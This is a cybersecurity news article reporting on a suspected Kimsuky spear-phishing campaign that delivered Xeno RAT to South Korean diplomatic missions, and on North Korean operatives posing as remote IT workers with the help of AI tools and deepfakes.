Between March and July 2025, North Korean hackers launched a cyber espionage campaign against South Korean diplomatic missions. At least 19 spear-phishing emails were sent, impersonating trusted officials and inviting recipients to fake meetings or events. These emails were written in multiple languages and often included realistic diplomatic details.
The attackers used GitHub as a covert command-and-control channel and relied on cloud services like Dropbox and Daum Cloud to deliver a modified version of Xeno RAT, a remote access trojan. The malware was hidden in password-protected ZIP files containing disguised shortcut files that executed PowerShell scripts. These scripts fetched additional payloads from GitHub and Dropbox while collecting system data.
The campaign is believed to be the work of the Kimsuky group, although some evidence points to Chinese involvement. Activity patterns matched Chinese time zones, and a pause during Chinese holidays added to the suspicion. Trellix researchers suggest the operation may involve North Korean operatives working from China, a Chinese group mimicking Kimsuky, or a joint effort.
Separately, CrowdStrike reported over 320 cases of North Koreans posing as remote IT workers to infiltrate companies and generate revenue. These operatives use AI tools like Microsoft Copilot, deepfake technology, and multiple email accounts, mostly Gmail to conceal their identities and perform tech-related jobs. Some even run "laptop farms" to simulate working from target countries.
The use of Korean services and infrastructure helps these actors blend into South Korean networks, making detection more difficult.
Found this article interesting? Follow us on X(Twitter) ,Threads and FaceBook to read more exclusive content we post.
